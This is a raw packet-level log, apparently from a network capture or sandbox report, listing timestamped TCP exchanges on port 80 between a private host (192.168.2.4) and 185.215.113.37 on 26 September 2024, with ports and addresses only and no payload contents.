Sep 26, 2024 22:40:20.355824947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.355824947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.355885983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.355911970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.355928898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.355942965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.355946064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.355964899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.355973959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.355974913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.355982065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.355994940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.356000900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.356014967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.356017113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.356040955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.356040955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.356060028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415309906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415424109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415440083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415466070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415461063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415481091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415496111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415512085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415528059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415529966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415528059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415528059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415545940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415561914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415561914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415577888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415580988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415642977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415671110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415724993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415741920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415755987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415771008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415786028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415791035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415791035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415811062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415818930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415818930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415827036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415838957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415843964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415858984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415877104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415885925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415900946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415915966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415930033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415939093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415956974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.415958881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415976048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.415977001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416002035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416012049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416018963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416043043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416043043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416043043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416059017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416063070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416074038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416090012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416105032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416112900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416129112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416146040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416161060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416177034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416192055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416218042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416233063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416249037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416265011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416301966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416330099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416331053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416331053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416331053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416331053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416331053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416331053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416331053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416387081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416403055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416412115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416413069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416413069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416419029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416435003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416448116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416448116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416452885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416470051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416470051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416521072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416521072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416565895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416589022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416604996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416621923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416639090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416649103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416649103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416655064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416671038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416687012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416698933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416703939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416718960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416719913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416735888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416747093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416753054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416768074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416794062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416794062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416806936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416851044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416851044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416867018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416882038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416887999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416898966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416913986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416927099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416929960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416938066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416945934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.416955948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.416987896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417067051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417083025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417098045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417114973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417124033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417146921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417171001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417182922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417197943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417212009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417228937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417228937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417241096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417243958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417260885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417277098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417284966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417293072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417294025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417294025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417309999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417313099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417325974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417341948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417342901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417357922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417367935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417391062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417411089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417452097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417478085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417493105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417509079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417526007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417529106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417542934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417551994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417558908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417573929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417573929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417586088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417591095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417606115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417606115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417623043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417625904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417634010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417639017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417654037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417655945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417665005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417670965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417684078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417699099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417711973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417718887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417728901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417745113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417759895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417773008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417776108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.417799950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.417814016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.446192980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.446295023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.446311951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.446329117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.446346998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.446362972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.446379900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.446398020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.446439981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.446439981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.446439981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.446439981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.446440935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.446440935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.446440935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.446440935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506303072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506349087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506417036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506452084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506469011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506505966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506520987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506521940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506555080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506560087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506614923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506616116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506653070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506675005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506704092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506727934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506737947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506762028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506771088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506779909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506803989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506819010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506839037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506854057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506891966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506894112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506927013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506948948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506962061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.506979942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.506997108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507015944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507031918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507045984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507085085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507113934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507169008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507169008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507225990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507232904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507260084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507277966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507293940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507322073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507348061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507350922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507405043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507440090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507450104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507450104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507472992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507487059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507523060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507527113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507581949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507620096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507657051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507671118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507692099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507715940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507725000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507741928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507766008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507771015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507801056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507814884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507836103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507857084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507869005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507894993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507904053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507915974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507940054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507949114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.507972956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.507986069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508008003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508029938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508042097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508053064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508074999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508090019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508109093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508124113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508141994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508162975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508174896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508186102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508208036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508220911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508241892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508261919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508275986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508285046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508311033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508326054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508342981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508354902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508428097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508464098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508465052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508486032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508498907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508508921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508533001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508552074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508567095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508589029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508600950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508613110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508636951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508654118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508671999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.508687019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.508707047 CEST	80	49730	185.215.113.37	192.168.2.4
